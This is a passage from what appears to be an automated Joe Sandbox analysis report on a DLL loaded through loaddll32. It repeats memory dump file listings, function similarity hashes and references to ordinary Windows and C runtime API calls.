                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                              • String ID: RoUninitialize$combase.dll
                              • API String ID: 3489934621-2819208100
                              • Opcode ID: c347f71645f4e9cbb1c9f4bbafd196147cbe049fcb10528375fe8d9ad7448d6d
                              • Instruction ID: 85882c74c154837950a9ff3030a60cbd7dc437c6996115344fb26efebfc5a819
                              • Opcode Fuzzy Hash: c347f71645f4e9cbb1c9f4bbafd196147cbe049fcb10528375fe8d9ad7448d6d
                              • Instruction Fuzzy Hash: BBE0B675B41280ABEF905B609D0CB043A74F78A3A6F604954F12AE5581DF788884DB19
                              APIs
                              • TlsGetValue.KERNEL32(00000023,321BCB28,?,?,?,?,00000000,6CEDF2C8,000000FF,6CECA93A), ref: 6CECA6DA
                              • TlsSetValue.KERNEL32(00000023,6CECA93A,?,?,00000000), ref: 6CECA747
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6CECA771
                              • HeapFree.KERNEL32(00000000), ref: 6CECA774
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapValue$FreeProcess
                              • String ID:
                              • API String ID: 1812714009-0
                              • Opcode ID: e75b1620e32988840b6cc26efa7d822f9daf9a9da7748e2cd10c1330eb48772c
                              • Instruction ID: d247649443776f22e0daade59204882fc222a2737bff4917cadab40b29420080
                              • Opcode Fuzzy Hash: e75b1620e32988840b6cc26efa7d822f9daf9a9da7748e2cd10c1330eb48772c
                              • Instruction Fuzzy Hash: 5751BF35B443449FDB50CF29C588B1677F5BB49368F298A58F87897B80D734AC02CB92
                              APIs
                              • _ValidateScopeTableHandlers.LIBCMT ref: 6CEDDD10
                              • __FindPESection.LIBCMT ref: 6CEDDD2A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FindHandlersScopeSectionTableValidate
                              • String ID:
                              • API String ID: 876702719-0
                              • Opcode ID: be4247c68518a498bcf7efcff4ed864745098f419eb181250847bfd5bf69eb7b
                              • Instruction ID: a8448177dc257eaf2065ea8ac5a8eff8d4f411ff374dae6e7ec376032e74de33
                              • Opcode Fuzzy Hash: be4247c68518a498bcf7efcff4ed864745098f419eb181250847bfd5bf69eb7b
                              • Instruction Fuzzy Hash: 55A1C0B9A056158FCB12CF59D88079DB7B4EB85318F364269DC15ABB41E731FA02CFA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer_memmove
                              • String ID: bad exception
                              • API String ID: 1721217611-3837556057
                              • Opcode ID: 25211d584a2d8631f95a4a5bd7ed9ed7602a2ce44e1d0719ecb4f6774da7c90a
                              • Instruction ID: 89e84701755d4bb132270be717d3a29a1bdff1e46c72d2a8012f711830c0547e
                              • Opcode Fuzzy Hash: 25211d584a2d8631f95a4a5bd7ed9ed7602a2ce44e1d0719ecb4f6774da7c90a
                              • Instruction Fuzzy Hash: B94108B124A3469EEB154E64D840BAA33B5DF0136EF32402DE85186FD0EF71F487D611
                              APIs
                                • Part of subcall function 6CEB40F7: GetSystemTimeAsFileTime.KERNEL32(6CEBB37E,?,6CEBB37E,?), ref: 6CEB40FD
                              • __aulldiv.LIBCMT ref: 6CEBB3BA
                              • __aulldiv.LIBCMT ref: 6CEBB3D2
                              • __aullrem.LIBCMT ref: 6CEBB3EA
                                • Part of subcall function 6CEB422F: __EH_prolog.LIBCMT ref: 6CEB4234
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CEBB44C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time__aulldiv$FileH_prologSystemUnothrow_t@std@@@__aullrem__ehfuncinfo$??2@
                              • String ID: ZCl
                              • API String ID: 435416484-1458945390
                              • Opcode ID: 89854e108fe8a2c1de4b0bad9dc5c35386985cc4bbbdfe621d58b33c104446ab
                              • Instruction ID: 7343a0625b9f1c60dfeff544db117a12ba43583cc06b3970a90f353a9c69a61d
                              • Opcode Fuzzy Hash: 89854e108fe8a2c1de4b0bad9dc5c35386985cc4bbbdfe621d58b33c104446ab
                              • Instruction Fuzzy Hash: 3041B475E00208AFDF08DFA8D945EEEBBB5FB08304F204059F519BB690DB35AA149B55
                              APIs
                              • ___BuildCatchObject.LIBCMT ref: 6CED4C14
                                • Part of subcall function 6CED522B: ___AdjustPointer.LIBCMT ref: 6CED5274
                              • _UnwindNestedFrames.LIBCMT ref: 6CED4C2B
                              • ___FrameUnwindToState.LIBCMT ref: 6CED4C3D
                              • CallCatchBlock.LIBCMT ref: 6CED4C61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                              • String ID: aPl
                              • API String ID: 2633735394-520660818
                              • Opcode ID: 9c5089780bf8366ab0c226da4d7e0303914d76154604f1882487ef4f805f9706
                              • Instruction ID: 71c89f9a9bdadbf06b2537d747d880e5a730864c2c2031746953e0c0880a70f4
                              • Opcode Fuzzy Hash: 9c5089780bf8366ab0c226da4d7e0303914d76154604f1882487ef4f805f9706
                              • Instruction Fuzzy Hash: 45012932100109BBDF125F55DD00EDA7BBAFF98718F224519F91861620D372E4A6DBA1
                              APIs
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB26FA
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB270A
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,6CEB2A32,?,?,?,00000000), ref: 6CEB271A
                              • GetLastError.KERNEL32(?,?,?,?,6CEB2A32,?,?,?,00000000), ref: 6CEB2724
                                • Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
